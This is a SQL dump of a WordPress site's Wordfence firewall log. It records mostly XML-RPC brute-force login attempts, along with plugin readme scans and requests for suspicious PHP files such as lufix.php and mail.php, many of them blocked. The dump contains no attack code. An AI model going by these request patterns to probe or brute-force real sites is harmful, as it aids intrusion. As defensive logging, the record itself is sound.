(51372, 0.000000, 1712320334.656187, '\0\0\0\0\0\0\0\0\0\0ÿÿ}>Zê', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51373, 0.000000, 1712320335.460377, '\0\0\0\0\0\0\0\0\0\0ÿÿuÌªN', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51374, 0.000000, 1712320343.473745, '\0\0\0\0\0\0\0\0\0\0ÿÿÙ¥"³', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51375, 0.000000, 1712320346.505030, '\0\0\0\0\0\0\0\0\0\0ÿÿšÀ/', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51376, 0.000000, 1712320358.198986, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ¿ðQ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51377, 0.000000, 1712320367.783478, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹“do', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51378, 0.000000, 1712320371.768716, '\0\0\0\0\0\0\0\0\0\0ÿÿ|Ùn', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51379, 0.000000, 1712320372.246268, '\0\0\0\0\0\0\0\0\0\0ÿÿw(PÕ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51380, 0.000000, 1712320382.653766, '\0\0\0\0\0\0\0\0\0\0ÿÿBµ¼x', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51381, 0.000000, 1712320385.089692, '\0\0\0\0\0\0\0\0\0\0ÿÿuÿ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51382, 1712320386.266037, 1712320385.747200, '\0\0\0\0\0\0\0\0\0\0ÿÿw(PÕ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(51383, 0.000000, 1712320386.660415, '\0\0\0\0\0\0\0\0\0\0ÿÿo}iÅ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51384, 0.000000, 1712320391.122466, '\0\0\0\0\0\0\0\0\0\0ÿÿSn¸p', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51385, 1712320389.128372, 1712320388.546900, '\0\0\0\0\0\0\0\0\0\0ÿÿw(PÕ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(51386, 0.000000, 1712320406.936869, '\0\0\0\0\0\0\0\0\0\0ÿÿÔJú', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51387, 0.000000, 1712320410.433605, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶¾ßM', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51388, 0.000000, 1712320413.620354, '\0\0\0\0\0\0\0\0\0\0ÿÿ^BÊ}', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51389, 0.000000, 1712320421.084864, '\0\0\0\0\0\0\0\0\0\0ÿÿ•9Ü', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51390, 0.000000, 1712320423.831578, '\0\0\0\0\0\0\0\0\0\0ÿÿÅ¸³¸', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51391, 0.000000, 1712320427.878091, '\0\0\0\0\0\0\0\0\0\0ÿÿ±%·i', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51392, 0.000000, 1712320431.500119, '\0\0\0\0\0\0\0\0\0\0ÿÿV|‰)', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51393, 0.000000, 1712320446.445349, '\0\0\0\0\0\0\0\0\0\0ÿÿg&\rc', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51394, 0.000000, 1712320449.432149, '\0\0\0\0\0\0\0\0\0\0ÿÿp‡Ïì', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51395, 0.000000, 1712320452.573761, '\0\0\0\0\0\0\0\0\0\0ÿÿ&¬š', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51396, 0.000000, 1712320454.931151, '\0\0\0\0\0\0\0\0\0\0ÿÿ,À', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51397, 0.000000, 1712320455.274498, '\0\0\0\0\0\0\0\0\0\0ÿÿe5êÛ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51398, 0.000000, 1712320462.547771, '\0\0\0\0\0\0\0\0\0\0ÿÿ)Økr', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51399, 0.000000, 1712320469.316786, '\0\0\0\0\0\0\0\0\0\0ÿÿJt;%', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51400, 0.000000, 1712320469.942486, '\0\0\0\0\0\0\0\0\0\0ÿÿ‚i…¢', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51401, 0.000000, 1712320474.167024, '\0\0\0\0\0\0\0\0\0\0ÿÿÉG%Þ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51402, 0.000000, 1712320491.841388, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜ú!È', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51403, 0.000000, 1712320492.589548, '\0\0\0\0\0\0\0\0\0\0ÿÿ]W<é', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51404, 0.000000, 1712320498.516409, '\0\0\0\0\0\0\0\0\0\0ÿÿWDº,', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51405, 0.000000, 1712320501.713992, '\0\0\0\0\0\0\0\0\0\0ÿÿÅñPù', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51406, 0.000000, 1712320506.236889, '\0\0\0\0\0\0\0\0\0\0ÿÿxÄb', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51407, 0.000000, 1712320509.557097, '\0\0\0\0\0\0\0\0\0\0ÿÿg0¶g', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51408, 0.000000, 1712320510.025892, '\0\0\0\0\0\0\0\0\0\0ÿÿ°=™b', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51409, 0.000000, 1712320513.063260, '\0\0\0\0\0\0\0\0\0\0ÿÿgK ]', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51410, 0.000000, 1712320514.582014, '\0\0\0\0\0\0\0\0\0\0ÿÿÄKâƒ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51411, 0.000000, 1712320521.130513, '\0\0\0\0\0\0\0\0\0\0ÿÿg_­a', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51412, 0.000000, 1712320522.022058, '\0\0\0\0\0\0\0\0\0\0ÿÿ¸aôˆ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51413, 0.000000, 1712320524.038619, '\0\0\0\0\0\0\0\0\0\0ÿÿ)›6º', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51414, 0.000000, 1712320532.500294, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼Iïè', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51415, 0.000000, 1712320533.532222, '\0\0\0\0\0\0\0\0\0\0ÿÿ_F¸i', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51416, 0.000000, 1712320537.948489, '\0\0\0\0\0\0\0\0\0\0ÿÿˆ—', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51417, 0.000000, 1712320539.653626, '\0\0\0\0\0\0\0\0\0\0ÿÿM.¢U', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51418, 0.000000, 1712320542.425047, '\0\0\0\0\0\0\0\0\0\0ÿÿËÀôÓ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51419, 0.000000, 1712320547.349180, '\0\0\0\0\0\0\0\0\0\0ÿÿ›9®', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51420, 0.000000, 1712320554.524429, '\0\0\0\0\0\0\0\0\0\0ÿÿËÀôS', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51421, 0.000000, 1712320553.846458, '\0\0\0\0\0\0\0\0\0\0ÿÿsö"', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51422, 0.000000, 1712320555.946628, '\0\0\0\0\0\0\0\0\0\0ÿÿŠvÅ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51423, 0.000000, 1712320558.533293, '\0\0\0\0\0\0\0\0\0\0ÿÿz«‚', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51424, 0.000000, 1712320564.131669, '\0\0\0\0\0\0\0\0\0\0ÿÿ«<œ‘', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51425, 0.000000, 1712320564.621339, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿±®´', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51426, 0.000000, 1712320567.419601, '\0\0\0\0\0\0\0\0\0\0ÿÿgÎ=A', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51427, 0.000000, 1712320569.530175, '\0\0\0\0\0\0\0\0\0\0ÿÿ„š>ƒ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51428, 0.000000, 1712320573.849218, '\0\0\0\0\0\0\0\0\0\0ÿÿ»úl', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51429, 0.000000, 1712320577.067150, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ½Å', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51430, 0.000000, 1712320577.365148, '\0\0\0\0\0\0\0\0\0\0ÿÿz­²', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51431, 0.000000, 1712320586.401636, '\0\0\0\0\0\0\0\0\0\0ÿÿgàØá', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51432, 0.000000, 1712320590.379801, '\0\0\0\0\0\0\0\0\0\0ÿÿ)­š', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51433, 0.000000, 1712320603.037799, '\0\0\0\0\0\0\0\0\0\0ÿÿ)Ñ9¨', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51434, 0.000000, 1712320606.787358, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ³ŸÁ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51435, 0.000000, 1712320615.202311, '\0\0\0\0\0\0\0\0\0\0ÿÿ“ëÑê', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51436, 1712320619.828130, 1712320619.213400, '\0\0\0\0\0\0\0\0\0\0ÿÿw(PÕ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(51437, 0.000000, 1712320623.747025, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ¤¶2', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51438, 0.000000, 1712320626.354473, '\0\0\0\0\0\0\0\0\0\0ÿÿËm,Ô', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51439, 0.000000, 1712320627.543836, '\0\0\0\0\0\0\0\0\0\0ÿÿˆž\ZD', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51440, 0.000000, 1712320630.555546, '\0\0\0\0\0\0\0\0\0\0ÿÿ´Âè', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51441, 1712320624.243243, 1712320622.534500, '\0\0\0\0\0\0\0\0\0\0ÿÿw(PÕ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(51442, 0.000000, 1712320637.658140, '\0\0\0\0\0\0\0\0\0\0ÿÿPE>“', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL);
INSERT INTO `wpou_wfhits` VALUES
(51443, 0.000000, 1712320642.169868, '\0\0\0\0\0\0\0\0\0\0ÿÿYmpš', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51444, 0.000000, 1712320643.724675, '\0\0\0\0\0\0\0\0\0\0ÿÿxL5', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51445, 1712320640.732572, 1712320640.046200, '\0\0\0\0\0\0\0\0\0\0ÿÿPE>“', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(51446, 1712320638.475439, 1712320638.084000, '\0\0\0\0\0\0\0\0\0\0ÿÿPE>“', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(51447, 0.000000, 1712320649.525288, '\0\0\0\0\0\0\0\0\0\0ÿÿ²¨n”', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51448, 0.000000, 1712320650.037084, '\0\0\0\0\0\0\0\0\0\0ÿÿÅÍvâ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51683, 1712367996.168842, 1712367995.831400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-vertical-gallery/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC12ZXJ0aWNhbC1nYWxsZXJ5L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC12ZXJ0aWNhbC1nYWxsZXJ5L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(50430, 1711358474.052386, 1711358473.698500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/lufix.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x1Zml4LnBocA==","category":"brute-force","ssl":1}'),
(50431, 1711358464.601090, 1711358464.232000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/mail.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21haWwucGhw","category":"brute-force","ssl":1}'),
(50444, 1711358287.591149, 1711358287.257000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JlcGVhdGVyLnBocA==","category":"brute-force","ssl":1}'),
